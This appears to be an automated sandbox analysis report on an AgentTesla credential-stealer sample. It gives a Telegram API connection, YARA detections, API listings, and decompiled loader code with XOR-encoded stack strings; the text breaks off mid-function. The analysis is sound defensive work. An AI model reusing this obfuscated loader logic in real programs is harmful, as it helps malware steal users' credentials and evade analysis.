                                                                                                                      Jan 27, 2021 15:42:37.710154057 CET149.154.167.220443192.168.2.749772CN=api.telegram.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Mar 24 14:48:17 CET 2020 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004Mon May 23 18:17:38 CEST 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                                                                                                                      CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031
                                                                                                                      CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USWed Jan 01 08:00:00 CET 2014Fri May 30 09:00:00 CEST 2031
                                                                                                                      OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USOU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=USTue Jun 29 19:06:20 CEST 2004Thu Jun 29 19:06:20 CEST 2034

                                                                                                                      Code Manipulations


                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Start time:15:39:38
                                                                                                                      Start date:27/01/2021
                                                                                                                      Path:C:\Users\user\Desktop\ttrpym.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:'C:\Users\user\Desktop\ttrpym.exe'
                                                                                                                      Imagebase:0xb80000
                                                                                                                      File size:907776 bytes
                                                                                                                      MD5 hash:3B53C639BD8EA883E5036A040F833415
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Reputation:low

                                                                                                                      General

                                                                                                                      Start time:15:39:52
                                                                                                                      Start date:27/01/2021
                                                                                                                      Path:C:\Users\user\Desktop\ttrpym.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:{path}
                                                                                                                      Imagebase:0xaa0000
                                                                                                                      File size:907776 bytes
                                                                                                                      MD5 hash:3B53C639BD8EA883E5036A040F833415
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.619489004.0000000003391000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.614226904.0000000000F82000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                      Reputation:low

                                                                                                                      Disassembly

                                                                                                                      Code Analysis

                                                                                                                        Executed Functions

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02DB97F6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: 1439edc56ad4c273a4eda3ba83fc04370a7a68e9b44f0c0276c133f812f3e032
                                                                                                                        • Instruction ID: 34890e4dde39fd49b75454b86192b4155957829160781d2cf3ca9d605e1d8ea7
                                                                                                                        • Opcode Fuzzy Hash: 1439edc56ad4c273a4eda3ba83fc04370a7a68e9b44f0c0276c133f812f3e032
                                                                                                                        • Instruction Fuzzy Hash: 697113B0A00B858FD725DF2AD46479AB7F5BF88204F00892ED596D7B50DB34E845CF91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 02DB5421
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2289755597-0
                                                                                                                        • Opcode ID: a9e90e5ffbdd5d57ee2fa3358ac6223b280d5ee54fe87adb55195df502a11189
                                                                                                                        • Instruction ID: 0f4ae5d1d6ecb335297410bdda65a4c49f9a5b2721c2dd0201f48fae79a87dc0
                                                                                                                        • Opcode Fuzzy Hash: a9e90e5ffbdd5d57ee2fa3358ac6223b280d5ee54fe87adb55195df502a11189
                                                                                                                        • Instruction Fuzzy Hash: 7541EFB1C0062CCFDB24CFA9D894BDEBBB1BF48308F61806AD449AB250D775594ACF90
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 02DB5421
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2289755597-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02DB9871,00000800,00000000,00000000), ref: 02DB9A82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02DBBA96,?,?,?,?,?), ref: 02DBBB57
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02DBBA96,?,?,?,?,?), ref: 02DBBB57
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02DB9871,00000800,00000000,00000000), ref: 02DB9A82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02DB9871,00000800,00000000,00000000), ref: 02DB9A82
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: LibraryLoad
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1029625771-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02DB97F6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264514303.00000000016CD000.00000040.00000001.sdmp, Offset: 016CD000, based on PE: false
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264514303.00000000016CD000.00000040.00000001.sdmp, Offset: 016CD000, based on PE: false
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.264653044.0000000002DB0000.00000040.00000001.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Executed Functions

                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E00401470(void* __ebx, void* __edx, void* __eflags) {
                                                                                                                        				intOrPtr _v8;
                                                                                                                        				char _v40;
                                                                                                                        				char _v44;
                                                                                                                        				char _v45;
                                                                                                                        				char _v46;
                                                                                                                        				char _v47;
                                                                                                                        				char _v48;
                                                                                                                        				char _v49;
                                                                                                                        				char _v50;
                                                                                                                        				char _v51;
                                                                                                                        				char _v52;
                                                                                                                        				char _v53;
                                                                                                                        				char _v54;
                                                                                                                        				char _v55;
                                                                                                                        				char _v56;
                                                                                                                        				char _v57;
                                                                                                                        				char _v58;
                                                                                                                        				char _v59;
                                                                                                                        				char _v60;
                                                                                                                        				char _v61;
                                                                                                                        				char _v62;
                                                                                                                        				char _v63;
                                                                                                                        				char _v64;
                                                                                                                        				char _v65;
                                                                                                                        				char _v66;
                                                                                                                        				char _v67;
                                                                                                                        				char _v68;
                                                                                                                        				char _v69;
                                                                                                                        				char _v70;
                                                                                                                        				char _v71;
                                                                                                                        				char _v72;
                                                                                                                        				char _v73;
                                                                                                                        				char _v74;
                                                                                                                        				char _v75;
                                                                                                                        				char _v76;
                                                                                                                        				struct HINSTANCE__* _v80;
                                                                                                                        				void* _v84;
                                                                                                                        				char _v116;
                                                                                                                        				signed int _v120;
                                                                                                                        				struct HRSRC__* _v124;
                                                                                                                        				char _v128;
                                                                                                                        				char _v129;
                                                                                                                        				char _v130;
                                                                                                                        				char _v131;
                                                                                                                        				char _v132;
                                                                                                                        				char _v133;
                                                                                                                        				char _v134;
                                                                                                                        				char _v135;
                                                                                                                        				char _v136;
                                                                                                                        				char _v137;
                                                                                                                        				char _v138;
                                                                                                                        				char _v139;
                                                                                                                        				char _v140;
                                                                                                                        				char _v141;
                                                                                                                        				char _v142;
                                                                                                                        				char _v143;
                                                                                                                        				char _v144;
                                                                                                                        				char _v145;
                                                                                                                        				char _v146;
                                                                                                                        				char _v147;
                                                                                                                        				char _v148;
                                                                                                                        				char _v149;
                                                                                                                        				char _v150;
                                                                                                                        				char _v151;
                                                                                                                        				char _v152;
                                                                                                                        				char _v153;
                                                                                                                        				char _v154;
                                                                                                                        				char _v155;
                                                                                                                        				char _v156;
                                                                                                                        				char _v157;
                                                                                                                        				char _v158;
                                                                                                                        				char _v159;
                                                                                                                        				char _v160;
                                                                                                                        				intOrPtr _v164;
                                                                                                                        				long _v168;
                                                                                                                        				void* _v172;
                                                                                                                        				intOrPtr _v176;
                                                                                                                        				intOrPtr _v180;
                                                                                                                        				signed int _v181;
                                                                                                                        				int _v188;
                                                                                                                        				char _v192;
                                                                                                                        				char _v193;
                                                                                                                        				char _v194;
                                                                                                                        				char _v195;
                                                                                                                        				char _v196;
                                                                                                                        				char _v197;
                                                                                                                        				char _v198;
                                                                                                                        				char _v199;
                                                                                                                        				char _v200;
                                                                                                                        				char _v201;
                                                                                                                        				char _v202;
                                                                                                                        				char _v203;
                                                                                                                        				char _v204;
                                                                                                                        				char _v205;
                                                                                                                        				char _v206;
                                                                                                                        				char _v207;
                                                                                                                        				char _v208;
                                                                                                                        				char _v209;
                                                                                                                        				char _v210;
                                                                                                                        				char _v211;
                                                                                                                        				char _v212;
                                                                                                                        				char _v213;
                                                                                                                        				char _v214;
                                                                                                                        				char _v215;
                                                                                                                        				char _v216;
                                                                                                                        				char _v217;
                                                                                                                        				char _v218;
                                                                                                                        				char _v219;
                                                                                                                        				char _v220;
                                                                                                                        				char _v221;
                                                                                                                        				char _v222;
                                                                                                                        				char _v223;
                                                                                                                        				char _v224;
                                                                                                                        				intOrPtr _v228;
                                                                                                                        				struct HINSTANCE__* _v760;
                                                                                                                        				char _v792;
                                                                                                                        				char _v796;
                                                                                                                        				struct HINSTANCE__* _v800;
                                                                                                                        				char _v940;
                                                                                                                        				char _v944;
                                                                                                                        				char _v945;
                                                                                                                        				char _v946;
                                                                                                                        				char _v947;
                                                                                                                        				char _v948;
                                                                                                                        				char _v949;
                                                                                                                        				char _v950;
                                                                                                                        				char _v951;
                                                                                                                        				char _v952;
                                                                                                                        				char _v953;
                                                                                                                        				char _v954;
                                                                                                                        				char _v955;
                                                                                                                        				char _v956;
                                                                                                                        				char _v957;
                                                                                                                        				char _v958;
                                                                                                                        				char _v959;
                                                                                                                        				char _v960;
                                                                                                                        				char _v961;
                                                                                                                        				char _v962;
                                                                                                                        				char _v963;
                                                                                                                        				char _v964;
                                                                                                                        				char _v965;
                                                                                                                        				char _v966;
                                                                                                                        				char _v967;
                                                                                                                        				char _v968;
                                                                                                                        				char _v969;
                                                                                                                        				char _v970;
                                                                                                                        				char _v971;
                                                                                                                        				char _v972;
                                                                                                                        				char _v973;
                                                                                                                        				char _v974;
                                                                                                                        				char _v975;
                                                                                                                        				char _v976;
                                                                                                                        				signed int _v977;
                                                                                                                        				int _v984;
                                                                                                                        				struct HINSTANCE__* _v988;
                                                                                                                        				intOrPtr _v992;
                                                                                                                        				intOrPtr _v996;
                                                                                                                        				intOrPtr _v1000;
                                                                                                                        				void* _v1004;
                                                                                                                        				struct HINSTANCE__* _v1008;
                                                                                                                        				char _v1040;
                                                                                                                        				signed int _v1044;
                                                                                                                        				struct HINSTANCE__* _v1048;
                                                                                                                        				char _v1080;
                                                                                                                        				char _v1604;
                                                                                                                        				void* _v1636;
                                                                                                                        				char _v1640;
                                                                                                                        				char _v1641;
                                                                                                                        				char _v1642;
                                                                                                                        				char _v1643;
                                                                                                                        				char _v1644;
                                                                                                                        				char _v1645;
                                                                                                                        				char _v1646;
                                                                                                                        				char _v1647;
                                                                                                                        				char _v1648;
                                                                                                                        				char _v1649;
                                                                                                                        				char _v1650;
                                                                                                                        				char _v1651;
                                                                                                                        				char _v1652;
                                                                                                                        				char _v1653;
                                                                                                                        				char _v1654;
                                                                                                                        				char _v1655;
                                                                                                                        				char _v1656;
                                                                                                                        				char _v1657;
                                                                                                                        				char _v1658;
                                                                                                                        				char _v1659;
                                                                                                                        				char _v1660;
                                                                                                                        				char _v1661;
                                                                                                                        				char _v1662;
                                                                                                                        				char _v1663;
                                                                                                                        				char _v1664;
                                                                                                                        				char _v1665;
                                                                                                                        				char _v1666;
                                                                                                                        				char _v1667;
                                                                                                                        				char _v1668;
                                                                                                                        				char _v1669;
                                                                                                                        				char _v1670;
                                                                                                                        				char _v1671;
                                                                                                                        				char _v1672;
                                                                                                                        				intOrPtr _v1676;
                                                                                                                        				char _v1680;
                                                                                                                        				char _v1681;
                                                                                                                        				char _v1682;
                                                                                                                        				char _v1683;
                                                                                                                        				char _v1684;
                                                                                                                        				char _v1685;
                                                                                                                        				char _v1686;
                                                                                                                        				char _v1687;
                                                                                                                        				char _v1688;
                                                                                                                        				char _v1689;
                                                                                                                        				char _v1690;
                                                                                                                        				char _v1691;
                                                                                                                        				char _v1692;
                                                                                                                        				char _v1693;
                                                                                                                        				char _v1694;
                                                                                                                        				char _v1695;
                                                                                                                        				char _v1696;
                                                                                                                        				char _v1697;
                                                                                                                        				char _v1698;
                                                                                                                        				char _v1699;
                                                                                                                        				char _v1700;
                                                                                                                        				char _v1701;
                                                                                                                        				char _v1702;
                                                                                                                        				char _v1703;
                                                                                                                        				char _v1704;
                                                                                                                        				char _v1705;
                                                                                                                        				char _v1706;
                                                                                                                        				char _v1707;
                                                                                                                        				char _v1708;
                                                                                                                        				char _v1709;
                                                                                                                        				char _v1710;
                                                                                                                        				char _v1711;
                                                                                                                        				char _v1712;
                                                                                                                        				intOrPtr _v1716;
                                                                                                                        				char _v2244;
                                                                                                                        				intOrPtr _v2248;
                                                                                                                        				char _v2280;
                                                                                                                        				signed int _v2284;
                                                                                                                        				struct HINSTANCE__* _v2288;
                                                                                                                        				struct HINSTANCE__* _v2292;
                                                                                                                        				char _v2556;
                                                                                                                        				char _v2588;
                                                                                                                        				char _v2592;
                                                                                                                        				char _v2593;
                                                                                                                        				char _v2594;
                                                                                                                        				char _v2595;
                                                                                                                        				char _v2596;
                                                                                                                        				char _v2597;
                                                                                                                        				char _v2598;
                                                                                                                        				char _v2599;
                                                                                                                        				char _v2600;
                                                                                                                        				char _v2601;
                                                                                                                        				char _v2602;
                                                                                                                        				char _v2603;
                                                                                                                        				char _v2604;
                                                                                                                        				char _v2605;
                                                                                                                        				char _v2606;
                                                                                                                        				char _v2607;
                                                                                                                        				char _v2608;
                                                                                                                        				char _v2609;
                                                                                                                        				char _v2610;
                                                                                                                        				char _v2611;
                                                                                                                        				char _v2612;
                                                                                                                        				char _v2613;
                                                                                                                        				char _v2614;
                                                                                                                        				char _v2615;
                                                                                                                        				char _v2616;
                                                                                                                        				char _v2617;
                                                                                                                        				char _v2618;
                                                                                                                        				char _v2619;
                                                                                                                        				char _v2620;
                                                                                                                        				char _v2621;
                                                                                                                        				char _v2622;
                                                                                                                        				char _v2623;
                                                                                                                        				char _v2624;
                                                                                                                        				signed int _v2628;
                                                                                                                        				intOrPtr _v2632;
                                                                                                                        				signed int _v2636;
                                                                                                                        				intOrPtr* _v3092;
                                                                                                                        				struct HINSTANCE__* _v3096;
                                                                                                                        				char _v3097;
                                                                                                                        				char _v3098;
                                                                                                                        				struct HINSTANCE__* _v3104;
                                                                                                                        				struct HINSTANCE__* _v3108;
                                                                                                                        				intOrPtr* _v3112;
                                                                                                                        				struct HINSTANCE__* _v3116;
                                                                                                                        				char _v3117;
                                                                                                                        				char _v3118;
                                                                                                                        				struct HINSTANCE__* _v3124;
                                                                                                                        				struct HINSTANCE__* _v3128;
                                                                                                                        				intOrPtr* _v3132;
                                                                                                                        				struct HINSTANCE__* _v3136;
                                                                                                                        				char _v3137;
                                                                                                                        				char _v3138;
                                                                                                                        				struct HINSTANCE__* _v3144;
                                                                                                                        				struct HINSTANCE__* _v3148;
                                                                                                                        				intOrPtr* _v3152;
                                                                                                                        				struct HINSTANCE__* _v3156;
                                                                                                                        				char _v3157;
                                                                                                                        				char _v3158;
                                                                                                                        				struct HINSTANCE__* _v3164;
                                                                                                                        				struct HINSTANCE__* _v3168;
                                                                                                                        				struct HINSTANCE__* _v3172;
                                                                                                                        				void* _v3176;
                                                                                                                        				short _v3178;
                                                                                                                        				void* _v3184;
                                                                                                                        				short _v3186;
                                                                                                                        				void* __edi;
                                                                                                                        				void* __esi;
                                                                                                                        				void* __ebp;
                                                                                                                        				intOrPtr _t518;
                                                                                                                        				void* _t521;
                                                                                                                        				int _t523;
                                                                                                                        				struct HINSTANCE__* _t534;
                                                                                                                        				signed int _t536;
                                                                                                                        				struct HINSTANCE__* _t547;
                                                                                                                        				CHAR* _t566;
                                                                                                                        				CHAR* _t584;
                                                                                                                        				signed int _t589;
                                                                                                                        				signed int _t592;
                                                                                                                        				signed int _t597;
                                                                                                                        				signed int _t603;
                                                                                                                        				signed int _t610;
                                                                                                                        				intOrPtr* _t618;
                                                                                                                        				intOrPtr* _t621;
                                                                                                                        				int _t624;
                                                                                                                        				intOrPtr* _t626;
                                                                                                                        				struct HINSTANCE__* _t627;
                                                                                                                        				intOrPtr* _t629;
                                                                                                                        				struct HINSTANCE__* _t630;
                                                                                                                        				intOrPtr _t638;
                                                                                                                        				signed int _t651;
                                                                                                                        				intOrPtr _t668;
                                                                                                                        				signed int _t688;
                                                                                                                        				signed int _t696;
                                                                                                                        				struct HINSTANCE__* _t699;
                                                                                                                        				struct HINSTANCE__* _t701;
                                                                                                                        				char _t704;
                                                                                                                        				char _t707;
                                                                                                                        				char _t709;
                                                                                                                        				char _t710;
                                                                                                                        				void* _t711;
                                                                                                                        				struct HRSRC__* _t716;
                                                                                                                        				signed int _t745;
                                                                                                                        				signed int _t747;
                                                                                                                        				char _t756;
                                                                                                                        				char _t759;
                                                                                                                        				intOrPtr _t767;
                                                                                                                        				intOrPtr _t769;
                                                                                                                        				char _t770;
                                                                                                                        				char _t771;
                                                                                                                        				void* _t772;
                                                                                                                        				void* _t779;
                                                                                                                        				void* _t782;
                                                                                                                        				void* _t784;
                                                                                                                        				void* _t787;
                                                                                                                        				void* _t796;
                                                                                                                        				void* _t803;
                                                                                                                        				void* _t804;
                                                                                                                        				void* _t805;
                                                                                                                        
                                                                                                                        				_t805 = __eflags;
                                                                                                                        				_t711 = __edx;
                                                                                                                        				_t643 = __ebx;
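                                                                                                                        				// Encoded stack string, decoded by E00402AB0 below. Inferred from the bytes, not stated in the report:
                                                                                                                        				// treated as a repeating-key XOR whose key shows through the zero-padded tail (0xf4 0x76 ... 0x6f 0xb4),
                                                                                                                        				// it decodes to "Cor_Enable_Profiling", the environment variable that enables a .NET CLR profiler.
                                                                                                                        				_v76 = 0xe0;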
                                                                                                                        				_v75 = 0x3b;
                                                                                                                        				_v74 = 0x8d;
                                                                                                                        				_v73 = 0x2a;
                                                                                                                        				_v72 = 0xa2;
                                                                                                                        				_v71 = 0x2a;
                                                                                                                        				_v70 = 0x2a;
                                                                                                                        				_v69 = 0x41;
                                                                                                                        				_v68 = 0xd3;
                                                                                                                        				_v67 = 0x20;
                                                                                                                        				_v66 = 0x64;
                                                                                                                        				_v65 = 6;
                                                                                                                        				_v64 = 0x8a;
                                                                                                                        				_v63 = 0xf7;
                                                                                                                        				_v62 = 0x3d;
                                                                                                                        				_v61 = 0x9d;
                                                                                                                        				_v60 = 0xd9;
                                                                                                                        				_v59 = 0xee;
                                                                                                                        				_v58 = 0x15;
                                                                                                                        				_v57 = 0x68;
                                                                                                                        				_v56 = 0xf4;
                                                                                                                        				_v55 = 0x76;
                                                                                                                        				_v54 = 0xb9;
                                                                                                                        				_v53 = 0x34;
                                                                                                                        				_v52 = 0xbf;
                                                                                                                        				_v51 = 0x1e;
                                                                                                                        				_v50 = 0xe7;
                                                                                                                        				_v49 = 0x78;
                                                                                                                        				_v48 = 0x98;
                                                                                                                        				_v47 = 0xe9;
                                                                                                                        				_v46 = 0x6f;
                                                                                                                        				_v45 = 0xb4;
                                                                                                                        				_v44 = 0;
                                                                                                                        				_push(E00402AB0( &_v76,  &_v40));
                                                                                                                        				_t518 = E0040EAB4(__ebx, _t711, _t772, _t779, _t805);
                                                                                                                        				_t784 = _t782 + 0xc;
                                                                                                                        				_v8 = _t518;
                                                                                                                        				if(_v8 == "0x1") {
                                                                                                                        					__eflags = 0;
                                                                                                                        					return 0;
                                                                                                                        				}
                                                                                                                        				_t521 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                                                                        				_v172 = _t521;
                                                                                                                        				_v1636 = 0x224;
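                                                                                                                        				// Encoded stack string. Assuming the repeating-key XOR suggested by the tail bytes these buffers share
                                                                                                                        				// (an inference), it decodes to "mscorjit.dll", the JIT compiler module of CLR 2.0.
                                                                                                                        				_v976 = 0xce;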
                                                                                                                        				_v975 = 0x27;
                                                                                                                        				_v974 = 0x9c;
                                                                                                                        				_v973 = 0x1a;
                                                                                                                        				_v972 = 0x95;
                                                                                                                        				_v971 = 0x2e;
                                                                                                                        				_v970 = 0x22;
                                                                                                                        				_v969 = 0x57;
                                                                                                                        				_v968 = 0x91;
                                                                                                                        				_v967 = 0x21;
                                                                                                                        				_v966 = 0x57;
                                                                                                                        				_v965 = 0x3a;
                                                                                                                        				_v964 = 0xf8;
                                                                                                                        				_v963 = 0x98;
                                                                                                                        				_v962 = 0x5b;
                                                                                                                        				_v961 = 0xf4;
                                                                                                                        				_v960 = 0xb5;
                                                                                                                        				_v959 = 0x87;
                                                                                                                        				_v958 = 0x7b;
                                                                                                                        				_v957 = 0xf;
                                                                                                                        				_v956 = 0xf4;
                                                                                                                        				_v955 = 0x76;
                                                                                                                        				_v954 = 0xb9;
                                                                                                                        				_v953 = 0x34;
                                                                                                                        				_v952 = 0xbf;
                                                                                                                        				_v951 = 0x1e;
                                                                                                                        				_v950 = 0xe7;
                                                                                                                        				_v949 = 0x78;
                                                                                                                        				_v948 = 0x98;
                                                                                                                        				_v947 = 0xe9;
                                                                                                                        				_v946 = 0x6f;
                                                                                                                        				_v945 = 0xb4;
                                                                                                                        				_v944 = 0;
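                                                                                                                        				// Encoded stack string. Assuming the repeating-key XOR suggested by the tail bytes these buffers share
                                                                                                                        				// (an inference), it decodes to "clrjit.dll", the JIT compiler module of CLR 4.
                                                                                                                        				_v1712 = 0xc0;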
                                                                                                                        				_v1711 = 0x38;
                                                                                                                        				_v1710 = 0x8d;
                                                                                                                        				_v1709 = 0x1f;
                                                                                                                        				_v1708 = 0x8e;
                                                                                                                        				_v1707 = 0x30;
                                                                                                                        				_v1706 = 0x65;
                                                                                                                        				_v1705 = 0x47;
                                                                                                                        				_v1704 = 0xd3;
                                                                                                                        				_v1703 = 0x29;
                                                                                                                        				_v1702 = 0x3b;
                                                                                                                        				_v1701 = 0x56;
                                                                                                                        				_v1700 = 0xf8;
                                                                                                                        				_v1699 = 0x98;
                                                                                                                        				_v1698 = 0x5b;
                                                                                                                        				_v1697 = 0xf4;
                                                                                                                        				_v1696 = 0xb5;
                                                                                                                        				_v1695 = 0x87;
                                                                                                                        				_v1694 = 0x7b;
                                                                                                                        				_v1693 = 0xf;
                                                                                                                        				_v1692 = 0xf4;
                                                                                                                        				_v1691 = 0x76;
                                                                                                                        				_v1690 = 0xb9;
                                                                                                                        				_v1689 = 0x34;
                                                                                                                        				_v1688 = 0xbf;
                                                                                                                        				_v1687 = 0x1e;
                                                                                                                        				_v1686 = 0xe7;
                                                                                                                        				_v1685 = 0x78;
                                                                                                                        				_v1684 = 0x98;
                                                                                                                        				_v1683 = 0xe9;
                                                                                                                        				_v1682 = 0x6f;
                                                                                                                        				_v1681 = 0xb4;
                                                                                                                        				_v1680 = 0;
                                                                                                                        				_t523 = Module32First(_v172,  &_v1636); // executed
                                                                                                                        				if(_t523 == 0) {
                                                                                                                        					L40:
                                                                                                                        					FindCloseChangeNotification(_v172); // executed
                                                                                                                        					_v800 = GetModuleHandleA(0);
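                                                                                                                        					// Encoded resource name passed through E00402AB0 to FindResourceA with type 0xa (RT_RCDATA).
                                                                                                                        					// Assuming the repeating-key XOR suggested by the shared tail bytes (an inference), it decodes to "__".
                                                                                                                        					_v160 = 0xfc;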
                                                                                                                        					_v159 = 0xb;
                                                                                                                        					_v158 = 0xff;
                                                                                                                        					_v157 = 0x75;
                                                                                                                        					_v156 = 0xe7;
                                                                                                                        					_v155 = 0x44;
                                                                                                                        					_v154 = 0x4b;
                                                                                                                        					_v153 = 0x23;
                                                                                                                        					_v152 = 0xbf;
                                                                                                                        					_v151 = 0x45;
                                                                                                                        					_v150 = 0x3b;
                                                                                                                        					_v149 = 0x56;
                                                                                                                        					_v148 = 0xf8;
                                                                                                                        					_v147 = 0x98;
                                                                                                                        					_v146 = 0x5b;
